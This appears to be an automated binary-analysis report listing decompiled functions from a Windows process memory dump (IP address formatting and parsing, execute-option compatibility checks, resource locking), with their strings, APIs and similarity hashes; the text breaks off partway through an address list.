0x00a6e9b9
0x00a6e978
0x00000000
0x00a6e978
0x00a6e98a
0x00a6e92a
0x00a6e931
0x00a6e944
0x00a6e944
0x00a6e950
0x00a6e954
0x00a6e959
0x00a6e95e
0x00a6e963
0x00a6e970
0x00000000
0x00a6e975
0x00a6e93b
0x00a6e980
0x00000000
0x00a6e980
0x00a6e942
0x00a6e94b
0x00000000
0x00a6e94b
0x00000000
0x00a6e942
0x00a413f4
0x00a413f4
0x00a413f9
0x00a413fc
0x00a413ff
0x00a41406
0x00a6e9cc
0x00a6e9d2
0x00a6e9d2
0x00a6e9cc
0x00a4140c
0x00a41411
0x00a41431
0x00a4143a
0x00a4143c
0x00a4143f
0x00a4143f
0x00a41442
0x00a41447
0x00a414a8
0x00a414ac
0x00a6e9e2
0x00a6e9e7
0x00a6e9ec
0x00a6ea05
0x00a6ea05
0x00000000
0x00a41449
0x00000000
0x00a41449
0x00a4144c
0x00a41459
0x00a41462
0x00a41469
0x00a4146a
0x00a41470
0x00a41473
0x00a41476
0x00a41476
0x00a41490
0x00a41495
0x00a4138e
0x00a41390
0x00a41397
0x00a41398
0x00a41399
0x00a413a1
0x00a413a4
0x00a413a4
0x00a41498
0x00a4149c
0x00a4149f
0x00a414a2
0x00000000
0x00000000
0x00a414a4
0x00000000
0x00a414a4
0x00a41413
0x00a41415
0x00a41416
0x00a41419
0x00a4141c
0x00a41422
0x00a413b7
0x00a413bc
0x00a413bf
0x00a413bf
0x00a413c2
0x00a41424
0x00a41424
0x00a41424
0x00a41427
0x00a4142b
0x00a4142c
0x00a4142c
0x00a4142c
0x00000000
0x00a4141c
0x00a41411

APIs

___swprintf_l.LIBCMT ref: 00A4146B
___swprintf_l.LIBCMT ref: 00A41490
___swprintf_l.LIBCMT ref: 00A6E970

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 00A6E9B0
:%u.%u.%u.%u, xrefs: 00A6E9F4
ffff:, xrefs: 00A6E94B
::%hs%u.%u.%u.%u, xrefs: 00A6E967

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
Instruction ID: e1aa2b2cf0698a4e7c588b1044186aa14fb124dc3b19fd814b75ede9394aa804
Opcode Fuzzy Hash: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
Instruction Fuzzy Hash: 766127B9904655AACB34DF99C8808BFBBF5EFD4300B14C52DF5D647581D374AA80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A37EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A37EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xae2088; // 0x775879ff
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00A37F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A53F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A0DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xae4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A53F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A10D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A53F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A18375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A53F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00A7E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A53F92();
					_t38 = 1;
					L2:
					return E00A0E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00a37f08
0x00a37f0f
0x00a37f12
0x00a37f1b
0x00a37f31
0x00a53ead
0x00a53eb4
0x00000000
0x00000000
0x00a53eba
0x00a53ecd
0x00a53ed2
0x00a53ee1
0x00a53ee7
0x00a53eec
0x00a53f12
0x00a53f18
0x00a53f1a
0x00000000
0x00000000
0x00a53f20
0x00a53f26
0x00a53f28
0x00000000
0x00000000
0x00a53f2e
0x00a53f30
0x00000000
0x00000000
0x00a53f3a
0x00a53f3b
0x00a53f53
0x00a53f64
0x00a53f69
0x00a53f6c
0x00a53f6d
0x00a53f6f
0x00a5e304
0x00a5e30f
0x00a5e315
0x00a5e31e
0x00a5e321
0x00a5e327
0x00a5e329
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5e32f
0x00a5e32f
0x00a5e337
0x00a5e33a
0x00a5e33b
0x00a5e33d
0x00a5e33f
0x00a5e341
0x00a5e341
0x00a5e34e
0x00a5e353
0x00a5e358
0x00a5e35d
0x00a5e35f
0x00000000
0x00000000
0x00a5e365
0x00a5e365
0x00a5e368
0x00a5e36e
0x00000000
0x00000000
0x00a5e374
0x00a5e32f
0x00a53f75
0x00a53f7a
0x00a53f7c
0x00a53f7e
0x00a53f86
0x00a37f39
0x00a37f47
0x00a37f47
0x00a37f37
0x00a37f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A53F12

Strings

ExecuteOptions, xrefs: 00A53F04
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A53EC4
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A5E2FB
CLIENT(ntdll): Processing section info %ws..., xrefs: 00A5E345
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A53F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A53F4A
Execute=1, xrefs: 00A53F5E

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
Instruction ID: bcf8181ec82f7fa613407dd87d0071683dedaee3ec0dbeed21306069688623c8
Opcode Fuzzy Hash: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
Instruction Fuzzy Hash: D2418672A8031C7ADF24DA94DCCAFEE73BCBB54701F0045A9B505A61C1EA709B49CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A40B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A40B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A18980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A0DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00A40CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00A40CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00A406BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00A406BA(_t135, _t178) == 0 || E00A40A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00A40CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00A40CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00A406BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00A406BA(_t124, _t142) == 0 || E00A40A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00a40b21
0x00a40b24
0x00a40b27
0x00a40b2a
0x00a40b2d
0x00a40b30
0x00a40b33
0x00a40b36
0x00a40b39
0x00a40b3e
0x00a40c65
0x00a40c68
0x00a40c6a
0x00a40c6f
0x00a6eb42
0x00000000
0x00000000
0x00a6eb48
0x00a6eb48
0x00a40c75
0x00a40c7a
0x00a6eb54
0x00000000
0x00000000
0x00000000
0x00a6eb5a
0x00a40c80
0x00a40c84
0x00a6eb98
0x00000000
0x00000000
0x00a6eba6
0x00a40cb8
0x00a40cba
0x00a40cd3
0x00a40cda
0x00a40ce4
0x00a40ce9
0x00000000
0x00a40cec
0x00a40c8c
0x00a6eb63
0x00000000
0x00000000
0x00a6eb70
0x00a6eb75
0x00a6eb7d
0x00000000
0x00000000
0x00a6eb8c
0x00000000
0x00a6eb8c
0x00a40c96
0x00000000
0x00000000
0x00a40ca2
0x00a40cac
0x00a40cb4
0x00000000
0x00000000
0x00a40b44
0x00a40b47
0x00a40b49
0x00000000
0x00000000
0x00a40b4f
0x00a40b50
0x00000000
0x00000000
0x00a40b56
0x00a40b62
0x00a40b7c
0x00a40bac
0x00a40a0f
0x00a6eaaa
0x00000000
0x00a6eac4
0x00a6eac4
0x00a40bd0
0x00a40bd0
0x00a40bd4
0x00a40bd9
0x00000000
0x00000000
0x00a40bdb
0x00a40be0
0x00a6eb0e
0x00a40a1a
0x00000000
0x00a40a1a
0x00a6eb1a
0x00a6eb1f
0x00a6eb27
0x00000000
0x00000000
0x00a6eb36
0x00000000
0x00a6eb36
0x00a40bea
0x00000000
0x00000000
0x00a40bf6
0x00a40c00
0x00a40c03
0x00a40c0b
0x00000000
0x00a40c0b
0x00a6eaaa
0x00000000
0x00a40a15
0x00a40bb6
0x00000000
0x00a40bc6
0x00a40bc6
0x00a40bcb
0x00a40c15
0x00000000
0x00000000
0x00a40c1d
0x00a40c20
0x00a40c21
0x00a40c24
0x00a40c24
0x00a40c26
0x00000000
0x00a40c26
0x00a40bcd
0x00000000
0x00a40bcd
0x00a40b89
0x00a40b89
0x00a40b90
0x00000000
0x00000000
0x00a40b96
0x00000000
0x00a40b96
0x00a40a04
0x00a40a04
0x00a40b9a
0x00a40b9a
0x00a40b9b
0x00a40b9f
0x00000000
0x00000000
0x00000000
0x00a40ba5
0x00a40ac7
0x00a40aca
0x00a6eacf
0x00000000
0x00a6eade
0x00a6eade
0x00a6eae3
0x00000000
0x00000000
0x00a6eaf3
0x00a6eaf6
0x00a6eaf7
0x00a6eafe
0x00a6eb01
0x00000000
0x00a6eb01
0x00a6eacf
0x00a40ad0
0x00a40ad4
0x00000000
0x00000000
0x00a40ada
0x00a40ae6
0x00a40c34
0x00000000
0x00a40c47
0x00a40c49
0x00a40c4a
0x00a40c4e
0x00a40c51
0x00a40c54
0x00a40c57
0x00a40c5a
0x00000000
0x00000000
0x00000000
0x00a40c60
0x00a40afb
0x00a40afe
0x00a40b02
0x00a40b05
0x00a40b08
0x00000000
0x00a40b08
0x00a40ae6
0x00a40b44
0x00a409f8
0x00a409f8
0x00a409f9
0x00000000
0x00000000
0x00a6eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00A40BF6
__fassign.LIBCMT ref: 00A40CA2

Strings

:, xrefs: 00A40AC7
:, xrefs: 00A40BA9
., xrefs: 00A40A0C

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: f214b70406de7362b1d73cde1ed0345798e7d126cc59d866e066e62151980aa1
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: EDA1E179D0030ADFCF24DF64C880EBEB7B4EF95305F24856ADA42A7282D7349A41EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A40554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A40554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t144);
									_push(0);
									_t51 = E009FF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00A44FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00A53F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00A8217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A53F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00A43915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
												_push(_t138);
												_push(0);
												_t58 = E009FF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00A44FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00A8217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00A53F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00A43915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A25384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E009FF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00A43915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00A43915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00A43915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00A25329(_t110, _t138);
																_t69 = E00A253A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x00a4055a
0x00a4055d
0x00a40563
0x00a40566
0x00a405d8
0x00a405e2
0x00a405e5
0x00000000
0x00a405e7
0x00a405e7
0x00a405ea
0x00a405f3
0x00a405f3
0x00a40568
0x00a40568
0x00a40568
0x00a40569
0x00a40569
0x00a40569
0x00a4056b
0x00000000
0x00000000
0x00a6217f
0x00a62183
0x00a6225b
0x00a6225f
0x00a62189
0x00a6218c
0x00a6218f
0x00a62194
0x00a62199
0x00a6219d
0x00a621a0
0x00a621a2
0x00a621ce
0x00a621ce
0x00a621ce
0x00a621d0
0x00a621d6
0x00a621de
0x00a621e2
0x00a621e8
0x00a621e9
0x00a621ec
0x00a621f1
0x00a621f6
0x00000000
0x00000000
0x00a621f8
0x00a621fb
0x00a62206
0x00a6220b
0x00a6220c
0x00a62217
0x00a62226
0x00a6222b
0x00a6222c
0x00a6222f
0x00a62232
0x00a62235
0x00a62235
0x00a6223a
0x00a6223f
0x00a62241
0x00a62243
0x00a62248
0x00a62248
0x00a6224d
0x00a6224f
0x00a62262
0x00a62263
0x00a62268
0x00a62269
0x00a62269
0x00a62269
0x00a6226d
0x00000000
0x00000000
0x00a62276
0x00a62279
0x00a6227e
0x00a62283
0x00a62287
0x00a6228a
0x00a6228d
0x00a6228f
0x00a622bc
0x00a622bc
0x00a622bc
0x00a622be
0x00a622c4
0x00a622cc
0x00a622d0
0x00a622d6
0x00a622d7
0x00a622da
0x00a622df
0x00a622e4
0x00000000
0x00000000
0x00a622e6
0x00a622e9
0x00a622f4
0x00a622f9
0x00a622fa
0x00a62305
0x00a62314
0x00a62319
0x00a6231a
